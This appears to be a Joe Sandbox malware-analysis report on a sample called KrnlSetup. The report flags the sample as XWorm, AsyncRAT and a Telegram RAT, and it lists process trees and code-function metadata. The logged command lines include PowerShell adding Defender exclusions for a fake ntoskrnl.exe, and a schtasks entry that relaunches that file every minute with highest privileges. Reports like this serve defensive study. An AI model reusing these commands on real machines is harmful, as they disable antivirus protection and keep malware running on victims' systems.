                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:04:04:19
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:04:04:34
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:04:04:34
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:04:04:55
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                                                              Imagebase:0x7ff76f990000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:04:04:55
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:04:04:57
                                                                              Start date:10/12/2024
                                                                              Path:C:\ProgramData\ntoskrnl.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\ProgramData\ntoskrnl.exe
                                                                              Imagebase:0xe0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ntoskrnl.exe, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 74%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:04:05:04
                                                                              Start date:10/12/2024
                                                                              Path:C:\ProgramData\ntoskrnl.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\ProgramData\ntoskrnl.exe"
                                                                              Imagebase:0xb0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:04:05:12
                                                                              Start date:10/12/2024
                                                                              Path:C:\ProgramData\ntoskrnl.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\ProgramData\ntoskrnl.exe"
                                                                              Imagebase:0x3a0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
                                                                              Imagebase:0x7ff76f990000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:21
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""
                                                                              Imagebase:0x7ff7a2650000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:23
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\timeout.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:timeout 3
                                                                              Imagebase:0x7ff6ad610000
                                                                              File size:32'768 bytes
                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:23.9%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:21.4%
                                                                                Total number of Nodes:14
                                                                                Total number of Limit Nodes:1

                                                                                Control-flow Graph (rendered graph omitted; node colouring distinguished executed from not-executed blocks)
                                                                                • Function 7ffd9b787b41-7ffd9b787c48, three basic blocks: the entry block calls CheckRemoteDebuggerPresent, the result selects either the single-instruction block at 7ffd9b787bff or the exit block 7ffd9b787c05-7ffd9b787c48, and the former falls through into the latter.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                • String ID: U
                                                                                • API String ID: 3662101638-3372436214
                                                                                • Opcode ID: 8766011165efd10bc69359b4e8dec4abed44827c3fe91720f9f06a3c327cce5c
                                                                                • Instruction ID: 3cc429e5a09922f9631c84d67f4762e5512b03779d9a9b5cdc343e71c320cc7c
                                                                                • Opcode Fuzzy Hash: 8766011165efd10bc69359b4e8dec4abed44827c3fe91720f9f06a3c327cce5c
                                                                                • Instruction Fuzzy Hash: FE3125319087588FCB18DF58C84ABE97BE0FF55311F0542AFD489D7192DB34A806CB91

                                                                                Control-flow Graph (rendered graph omitted; node colouring distinguished executed from not-executed blocks)
                                                                                • Function starting at 7ffd9b789369, basic blocks spanning 7ffd9b789369-7ffd9b78a6f7; calls 7ffd9b789010, 7ffd9b780388, 7ffd9b7881a8, 7ffd9b780398, 7ffd9b788468, 7ffd9b780378 and, repeatedly, 7ffd9b780358. No Windows API is resolved in this graph (API ID empty below); only the string "B" is referenced.
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: B
                                                                                • API String ID: 0-1255198513
                                                                                • Opcode ID: 93a397406e5cc29279a83a4b8bcfeb3488ea52bd85d18cffa4bbfa08ad72ae5e
                                                                                • Instruction ID: b9f8763a0d37420033fa93b0d5f50ed61a7a870f057aa6b22eba7b4325cab1ab
                                                                                • Opcode Fuzzy Hash: 93a397406e5cc29279a83a4b8bcfeb3488ea52bd85d18cffa4bbfa08ad72ae5e
                                                                                • Instruction Fuzzy Hash: 94A29374B18B098FE758EF6884A9BBDB7E2FF98305F504579E00DD3295DE34A8818B41

                                                                                Control-flow Graph (rendered graph omitted; node colouring distinguished executed from not-executed blocks)
                                                                                • Function starting at 7ffd9b791fda, basic blocks spanning 7ffd9b791fda-7ffd9b792c0c; calls 7ffd9b780d30 (repeatedly), 7ffd9b78d468, 7ffd9b78d470, 7ffd9b791c20 and 7ffd9b78e020, with most paths converging on the common exit blocks at 7ffd9b792336 and 7ffd9b792bfe. No Windows API is resolved in this graph; only the string "U" is referenced.
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: f0e3c4f32fc2f06a9efdb1dd97a62b65254d1904be1cb8da43ec23362337baf9
                                                                                • Instruction ID: 7dadeb19edbb735c88b40df4f7362b76a98e4be4688b6f52fe9a747674b5dffe
                                                                                • Opcode Fuzzy Hash: f0e3c4f32fc2f06a9efdb1dd97a62b65254d1904be1cb8da43ec23362337baf9
                                                                                • Instruction Fuzzy Hash: CB72C424B1CB094FE75CFB78486A679B7D2FF98700F5546BDE40DC32E6DE28A8418642

                                                                                Control-flow Graph (rendered graph omitted; node colouring distinguished executed from not-executed blocks)
                                                                                • Function starting at 7ffd9b781709, basic blocks spanning 7ffd9b781709-7ffd9b782096; the entry block calls 7ffd9b780668 nine times followed by 7ffd9b780a58, and later blocks call 7ffd9b7804c8, 7ffd9b7804c0, 7ffd9b780358, 7ffd9b780368, 7ffd9b780378, 7ffd9b781028, 7ffd9b781370, 7ffd9b7812f8, 7ffd9b780388, 7ffd9b780398, 7ffd9b7803a8, 7ffd9b781200, 7ffd9b7804b0, 7ffd9b7809f8, 7ffd9b7804b8 and 7ffd9b781278. No Windows API is resolved in this graph; only the string "U" is referenced.
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: 7da51b4d0a832a471125286e035b71f644fa8f66e3a48a2534c4aeb28b486401
                                                                                • Instruction ID: 39bdb60e31ebf5da82eba38e75973b8ed016bb521de06cd4308c3b5785b6e94e
                                                                                • Opcode Fuzzy Hash: 7da51b4d0a832a471125286e035b71f644fa8f66e3a48a2534c4aeb28b486401
                                                                                • Instruction Fuzzy Hash: EA52B474B19E094FE798EB6C84B5ABD77D2EF98301F4406B9E01EC32E6DD38A9418741

                                                                                Control-flow Graph (rendered graph omitted; node colouring distinguished executed from not-executed blocks)
                                                                                • Function starting at 7ffd9b793fb9, basic blocks spanning 7ffd9b793fb9-7ffd9b7946ed; calls 7ffd9b78eb38 (twice), 7ffd9b792d48 and 7ffd9b78b010. No Windows API is resolved in this graph; only the string "{L_H" is referenced.
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: {L_H
                                                                                • API String ID: 0-2715681820
                                                                                • Opcode ID: f16b226badfc56195a18ae1a65e2889d3a77169e4ffb4a79a734b87075dd68b1
                                                                                • Instruction ID: ccf5d3d3ffe793997895e25917d31e4b411cb56ca9044e1f846d5c24ca790993
                                                                                • Opcode Fuzzy Hash: f16b226badfc56195a18ae1a65e2889d3a77169e4ffb4a79a734b87075dd68b1
                                                                                • Instruction Fuzzy Hash: 4C023170A0AA1D8FDBA8DF58D8A4BA877F1FF59311F5101B9D04DD32A1CA34A985CF41

                                                                                Control-flow Graph

                                                                                • Control-flow graph (rendered figure not recoverable from extraction; executed/not-executed block colouring lost): basic blocks 7ffd9b787342-7ffd9b7877cf, with a call to 7ffd9b7877d0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: e2e3e85ab044fbbdc47d99609f9b1624818b93f95e9e91638edf8b8b9d99ec96
                                                                                • Instruction ID: c03b20e96b34606190dc39399b53fc77fddf2f224fa11ef998a7ad9e06aa0202
                                                                                • Opcode Fuzzy Hash: e2e3e85ab044fbbdc47d99609f9b1624818b93f95e9e91638edf8b8b9d99ec96
                                                                                • Instruction Fuzzy Hash: F0E1C430A09A4E4FEBA8DF28C8A57E977D1FF54311F04426ED85EC72A5CF74A9418781

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: ad7dbf12b7d618b382830d76d4a04463a1765c3c0e5c3283a8233199238bac01
                                                                                • Instruction ID: 071e2368c8b584dddcd913a3c342c08dc1eb41e2dc009b17dffd0ea609c9a984
                                                                                • Opcode Fuzzy Hash: ad7dbf12b7d618b382830d76d4a04463a1765c3c0e5c3283a8233199238bac01
                                                                                • Instruction Fuzzy Hash: A5C1B760B1DE094FEB98EBB844B56BD77D2EF98302F054279E05EC32E6DE38A9414741

                                                                                Control-flow Graph

                                                                                • Control-flow graph (rendered figure not recoverable from extraction; executed/not-executed block colouring lost): basic blocks 7ffd9b7821c1-7ffd9b78238f, no calls
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: A
                                                                                • API String ID: 0-3554254475
                                                                                • Opcode ID: 1e103471ba372e569b55485358f7cbe7f3b51a045b9203d3038600d43aef4d14
                                                                                • Instruction ID: 0785f05abad2dc93e13a8f6e8badc5477120f01f804e530899875e2965e6f1ee
                                                                                • Opcode Fuzzy Hash: 1e103471ba372e569b55485358f7cbe7f3b51a045b9203d3038600d43aef4d14
                                                                                • Instruction Fuzzy Hash: 85510E10B1EAC90FD796ABB808B46657FD4DF8722AB0901FBE09DC71E7DD281906C342
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0afdfddcfdde6fd8f4b82712e143d3a8b627129f9837de94a722314dd956f724
                                                                                • Instruction ID: f06fe0ccba03d2758aba7323405beb46aa5235ddcb97bee0cd8671921e7917a8
                                                                                • Opcode Fuzzy Hash: 0afdfddcfdde6fd8f4b82712e143d3a8b627129f9837de94a722314dd956f724
                                                                                • Instruction Fuzzy Hash: AA628434F1DA0D4FEBA8FBB884A5A7D72D2EF98310B514674D41DD32E6DE28E9428740
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 572f377305c2b4321934e266aba69add0044ef907fc6e46b8cd0077d490483ee
                                                                                • Instruction ID: c4f1ed2b42a696114be00df06f157fd642ae06b47239bb27db890881ffaee48d
                                                                                • Opcode Fuzzy Hash: 572f377305c2b4321934e266aba69add0044ef907fc6e46b8cd0077d490483ee
                                                                                • Instruction Fuzzy Hash: 53F1B630609A4D8FEBA8DF28D8957E937D1FF54301F04426EE85DC72A5DB34E9418B81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e6383324e35554e62c352dc8a7bd2b1b034d8de82532635eb76dbec419256eb
                                                                                • Instruction ID: 14056164c2744b2a0700acecbaf2cc7bc3493f69fe40b373c05e70964531e6f6
                                                                                • Opcode Fuzzy Hash: 3e6383324e35554e62c352dc8a7bd2b1b034d8de82532635eb76dbec419256eb
                                                                                • Instruction Fuzzy Hash: 9F51CA70E18A0D8FDB98EFA8D495AACB7F1FF59305F111169D41DE72A1CB34A981CB40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 724bc6aedc04ff5d0f8223eddfa39ba1984c5fa2b583335694ae6e9c67787d43
                                                                                • Instruction ID: ec8f60e80453194b111a4f4797a102d5f8a4f96d2ea7a73ba8421a668951fb86
                                                                                • Opcode Fuzzy Hash: 724bc6aedc04ff5d0f8223eddfa39ba1984c5fa2b583335694ae6e9c67787d43
                                                                                • Instruction Fuzzy Hash: 6A51E834E0961D8ADBB9EBA4C8646FDB3B1FF59301F110679D01DE32A5CE356A41CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID: U
                                                                                • API String ID: 2559412058-3372436214
                                                                                • Opcode ID: d95ad969d568710ec4a241daa3d8d151d88afccf70022bc2eeb93e300c114f96
                                                                                • Instruction ID: 432544b367f4ae32e852c8aded3329464ef1ad82d13079be58bc26d319dd92f6
                                                                                • Opcode Fuzzy Hash: d95ad969d568710ec4a241daa3d8d151d88afccf70022bc2eeb93e300c114f96
                                                                                • Instruction Fuzzy Hash: DB310630A1CA5D4FDB18DB6898566F9BBE1EB59321F00427ED05DC3292DE75A8128BC1

                                                                                Control-flow Graph

                                                                                • Control-flow graph (rendered figure not recoverable from extraction; executed/not-executed block colouring lost): basic blocks 7ffd9b78b75d-7ffd9b78b87d, calling RtlSetProcessIsCritical (the BreakOnTermination flag noted in the signatures)
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalProcess
                                                                                • String ID:
                                                                                • API String ID: 2695349919-0
                                                                                • Opcode ID: 6c76c5119c1d4d31ac04276690eb69eca1e45bb9444ceafa3524db2544e5c8c2
                                                                                • Instruction ID: 62fc05def57507ce40086a306432ef2797e52d210626c9cda6fde2f090505960
                                                                                • Opcode Fuzzy Hash: 6c76c5119c1d4d31ac04276690eb69eca1e45bb9444ceafa3524db2544e5c8c2
                                                                                • Instruction Fuzzy Hash: 9941F43190C7588FDB19DFA8D855AE9BBF0FF56311F04416EE08AC3692CB746846CB91

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 14ca80640a43f24038673011a57b44abaf785de174ab7f64926646fb01938460
                                                                                • Instruction ID: dba1b73c11a4e330f74b700fc18fde56d8ebca2fa14ca4c847f8a3392fff1382
                                                                                • Opcode Fuzzy Hash: 14ca80640a43f24038673011a57b44abaf785de174ab7f64926646fb01938460
                                                                                • Instruction Fuzzy Hash: 34212031D0D74D9FEB65DBA894863E87BE0FF01322F15427AD45AC30E2CA38A5568751
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 42834c271967b30959e8a37bf70810d6027de2251111677fa82de57c593c8eac
                                                                                • Instruction ID: 75a9812f11ae98e1e81d30333148b891927445acebcb07fab3bab8c213fe2e6f
                                                                                • Opcode Fuzzy Hash: 42834c271967b30959e8a37bf70810d6027de2251111677fa82de57c593c8eac
                                                                                • Instruction Fuzzy Hash: 5651671BF0E56A09E72576FCB9659FD7B10DF96332F0443B7E54D890E78E08200A8AD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784564912.00007FFD9B65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B65D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b65d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6~ca
                                                                                • API String ID: 0-3725481105
                                                                                • Opcode ID: 325a37a132b00859a91e9b0148a8281d4730f971419205ca93703e0302751fda
                                                                                • Instruction ID: b1ee88a1aca96b33ed208f13d293e91d7b1bf86bcccee8965394920bb751d6ab
                                                                                • Opcode Fuzzy Hash: 325a37a132b00859a91e9b0148a8281d4730f971419205ca93703e0302751fda
                                                                                • Instruction Fuzzy Hash: 9941057150EBC44FEB668B6898519523FF0EF56314B1605EFD0C8CF1A3D625B846C792
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784955588.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cffd7597af7eb25ee3222055bd24ece76451836ecffe996493434602c46b702a
                                                                                • Instruction ID: 8cde08219a64f1d32359a2393b7f63c2bc95e761babe0216ede64e2375485e2e
                                                                                • Opcode Fuzzy Hash: cffd7597af7eb25ee3222055bd24ece76451836ecffe996493434602c46b702a
                                                                                • Instruction Fuzzy Hash: E2D17531A18A4D8FDF94DF5CC495AAD7BF1FF68300F1542AAD409D72A9CA74E841CB81
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d4ee085e9a003295154f5ec3d88201d1a7abd1c9bf7809088144248e51ceb073
                                                                                • Instruction ID: e106641ca6839263c0fb31943aa9fa3d91c658247a9366f50177b98824c97747
                                                                                • Opcode Fuzzy Hash: d4ee085e9a003295154f5ec3d88201d1a7abd1c9bf7809088144248e51ceb073
                                                                                • Instruction Fuzzy Hash: 2BD146B2B0EA8E4FEBA5AB6848745B57BE2EF1D314B0901FED45DC70E3D918A805C341
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785472496.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9941bda7c109a324e3fea8e41f58c2309582b92f0669562eb182035f098a59e3
                                                                                • Instruction ID: faebd57f8490eee62041f42ec2aa6be8ccd9e031355d2c6f9a9d2f52021b3238
                                                                                • Opcode Fuzzy Hash: 9941bda7c109a324e3fea8e41f58c2309582b92f0669562eb182035f098a59e3
                                                                                • Instruction Fuzzy Hash: B581DEA2F0FA8A4FEBB59BA844745787BD2EF1D314B1A01FED459CB1E7D918AC048301
                                                                                Memory Dump Source
